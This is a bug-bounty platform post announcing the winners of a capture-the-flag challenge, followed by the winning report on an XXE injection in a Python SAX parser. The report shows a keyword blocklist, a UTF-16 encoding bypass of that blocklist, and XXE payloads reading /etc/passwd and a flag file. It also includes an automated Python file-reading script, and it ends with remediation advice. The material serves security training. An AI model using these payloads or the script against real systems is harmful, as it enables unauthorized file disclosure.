Dojo challenge #34 winners!

August 5, 2024

The 34th Dojo Challenge, AI Image Generator, invited participants to exploit a XML external entity (XXE) injection (CWE-611) vulnerability and read a file containing the challenge flag.

We are delighted to announce the winners of Dojo Challenge #34 below.

💡 Want to create your own monthly Dojo challenge? Send us a message on Twitter!

3 BEST REPORT WRITE-UPS

Congrats to greenhat, __init__ and rafffff for the best write-ups 🥳

The swag is on its way! 🎁

Subscribe to our Twitter and/or LinkedIn feeds to be notified of upcoming challenges.

Read on to find out how one of the winners managed to solve the challenge.

The challenge

We asked you to produce a qualified report explaining the logic allowing exploitation, as set out by the challenge.

This write-up serves two purposes:

  • To ensure contestants actually solved the challenge themselves rather than copy-pasting the answer from elsewhere.
  • To determine contestants' ability to properly describe a vulnerability and its vectors within a professionally redacted report. This gives us invaluable hints on your unique talent as a bug hunter.

OVERALL BEST WRITE-UP

We want to thank everyone who participated and reported to the Dojo challenge. Many other high quality reports were submitted alongside those of the three winners. 😉

Below is the best write-up overall. Thanks again for all your submissions and thanks for playing!

rafffff‘s Write-Up

————– START OF rafffff‘s REPORT —————

Description

A XXE (XML External Entity) vulnerability occurs when an application allows an attacker to include insecure external entities in an XML document.

This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Vulnerable applications may include web services, applications that use XML documents for data processing, or any workflow that improperly controls XML data.

Exploitation

We are presented with a web application giving us a prompt in order to give our input to an AI generating images. We can either directly give it a theme or input a base64 string of an XML file.

Code analysis - Part 1

When we analyze the source code, we notice the promptFromXML function, which we're going to focus on:

def promptFromXML(s:str):
    dataBytes = base64.b64decode(s)

    if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):
        #Allow parsing for casual svg
        if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
            return 'BLOCKED'

    data = dataBytes.decode(detect_encoding(dataBytes))

    handler = XMLContentHandler()
    parser = xml.sax.make_parser()

    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    parser.setContentHandler(handler)

    parser.parse(io.StringIO(data))

    return handler.get_text()

One line catches instantly our attention:

parser.setFeature(xml.sax.handler.feature_external_ges, True)

Indeed, this line of Python code is used to configure the XML parser to allow the processing of external general entities (external general entities are entities declared outside the DTD (Document Type Definition) of an XML document).

  • parser: is an instance of an XML parser.
  • setFeature: is a method used to enable or disable certain features of the XML parser.
  • xml.sax.handler.feature_external_ges: is a predefined constant in the xml.sax.handler module that specifies the feature to allow external general entities.
  • True: enables this feature.

This confirms that an XXE attack is possible on the web application if we manage to craft a malicious XML file.

Code analysis - Part 2

if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):

The first condition if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'): checks for the presence of Byte Order Mark (BOM) signatures for UTF-16 little-endian (b'\xff\xfe') and UTF-16 big-endian (b'\xfe\xff'). Here's the purpose of this verification:

  1. Detection of UTF-16 Encoding: BOM signatures are used to indicate the encoding of a text file, especially for UTF-16. b'\xff\xfe' signifies that the text is encoded in UTF-16 little-endian, while b'\xfe\xff' signifies that the text is encoded in UTF-16 big-endian.
  2. Ensuring Compatibility: By checking these signatures, the code ensures that the data it processes is not encoded in UTF-16. If the data were UTF-16 encoded, it would require special handling to be correctly decoded. The absence of these signatures allows the code to proceed under the assumption that the data is encoded in another format (likely UTF-8 or another encoding without a BOM).
  3. Preventing Processing Errors: If the data were UTF-16 encoded but processed as another encoding, it could lead to processing errors or unexpected behaviors. By checking for and excluding UTF-16 encoded data, the code reduces the risk of such errors.

However, it appears that the code lacks explicit handling for data that contains a UTF-16 BOM. It would be prudent to add an else block to handle this situation if necessary, for instance, by returning an error or correctly decoding the UTF-16 data.

Code analysis - Part 3

if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
  return 'BLOCKED'

The second condition if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']): checks for the presence of certain substrings within the decoded data. Here's the purpose of this verification:

  1. Detection of Potentially Dangerous Content: This condition searches for specific keywords and substrings that could indicate dangerous or sensitive content. For example:
    • b'file://' could be used to attempt file access or directory traversal.
    • b'tmp' and b'flag.txt' might refer to sensitive files or directories.
    • b'system' and b'public' could be related to critical system paths or publicly accessible areas.
    • b'entity' is relevant in the context of XML parsing and could be related to XML External Entity (XXE) attacks.
  2. Preventing Security Risks: By detecting these potentially dangerous substrings, the code can prevent the processing of malicious data that could lead to security vulnerabilities. For instance, an XXE attack might involve using external entities to access sensitive files, and this condition helps block such attempts.
  3. Early Detection of Malicious Input: This check acts as an early warning system for malicious input, allowing the function to return 'BLOCKED' immediately if any of these keywords are found. This prevents further processing of potentially harmful data, reducing the risk of security breaches.

Overall, this condition helps enhance the security of the application by detecting and blocking potentially harmful content before it can be processed and cause damage.

Code analysis - Conclusion

From our analysis, we note that:

  • The parser allows parsing of general entities.
  • A UTF16 little-endian of big-endian bypass the blacklist protection

In order to exploit the vulnerability, we then can take a classic XXE payload :

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>

And use any program to encode it as UTF16 little-endian (or big), then encode it to base64 and feed it to application.

To do so, we've used the iconv and base64 binaries, on our XML file containing our payload:

iconv -t utf-16le xxe.xml | base64 -w 0

Copy paste the result to the prompt of the application and verify the exploitation:

Indeed, we got the content of the /etc/passwd file displayed.

PoC

In order to retrieve the content of the flag.txt file, we use the following XML payload :

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]><root>&test;</root>

Convert it with iconv and base64 to get the following payload:

PAA/AHgAbQBsACAAdgBlAHIAcwBpAG8AbgA9ACIAMQAuADAAIgA/AD4APAAhAEQATwBDAFQAWQBQAEUAIAByAG8AbwB0ACAAWwA8ACEARQBOAFQASQBUAFkAIAB0AGUAcwB0ACAAUwBZAFMAVABFAE0AIAAnAGYAaQBsAGUAOgAvAC8ALwB0AG0AcAAvAGYAbABhAGcALgB0AHgAdAAnAD4AXQA+ADwAcgBvAG8AdAA+ACYAdABlAHMAdAA7ADwALwByAG8AbwB0AD4ACgA=

Retrieving the flag : FLAG{Y0u_Pwniied_Th3_AI!!}

In order to automate the task I wrote a script that automate the task, here is a demonstration :

And here is the code:

from cmd import Cmd
import requests
import re
from base64 import b64encode

url = "https://dojo-yeswehack.com/api/challenges/c95c29c0-cf7c-4140-828e-76c483ba1f03"
cookies = {
    "jwt" : "" # !!! CONNECT TO THE APP, AND INSERT YOUR JWT  !!!
}
base_payload = """<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file://PLACEHOLDER'>]><root>&test;</root>"""

class Terminal(Cmd):
    prompt = "[YWH - dojo 34] Filepath > "

    def do_exit(self, line):
        print("Bye !")
        return True
    def default(self, line):
        payload = base_payload.replace("PLACEHOLDER", line)
        payload16LE = payload.encode("utf-16le")
        payload16LEB64 = b64encode(payload16LE)

        final = { "input" : payload16LEB64 }
        r = requests.post(url, cookies=cookies, data=final)
        if r.status_code == 200:
            pattern = re.compile(r'<p>(.*?)</p>', re.DOTALL)
            match = pattern.search(r.text)
            if match:
                out = match.group(1).encode().decode('unicode_escape')
                if "Your prompt to get this fancy" not in out:
                    print(out)
                else:
                    print("File doesn't exists or is unreadble ...")
        else:
            print("Error: something went wrong with the request ...")

terminal = Terminal()
terminal.cmdloop()

Risk

XXE (XML External Entity) vulnerabilities pose significant security risks to systems. By exploiting these vulnerabilities, attackers can gain access to sensitive files on the server, execute remote code, or retrieve confidential data.
This can lead to privacy breaches, data integrity violations, or even complete compromise of the system. Vulnerable applications often include web services and other applications that handle XML data without properly controlling it, exposing these systems to significant risks of exploitation by malicious actors.

Remediation

To protect against XXE (XML External Entity) vulnerabilities, we recommend following these measures:

  • Disable external entities: Configure XML processors to disable support for insecure external entities.
  • Use secure XML libraries: Utilize secure XML libraries that implement protections against XXE attacks.
  • Validate and filter user inputs: Rigorously validate and filter all incoming XML data to eliminate unauthorized external entities and potentially malicious data.
  • Update libraries and frameworks: Ensure all XML libraries used are up-to-date with the latest security patches to mitigate risks.
  • Awareness and training: Educate developers and security teams on best practices for securing XML applications and web services.

By implementing these measures, you can effectively reduce the risks of XXE vulnerabilities in your applications and systems.

References

  • OWASP - XML External Entity (XXE) Processing : https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
  • Python Docs - Vulnerabilities affecting of the SAX parser : https://docs.python.org/3/library/xml.html#xml-vulnerabilities

————– END OF rafffff‘s REPORT —————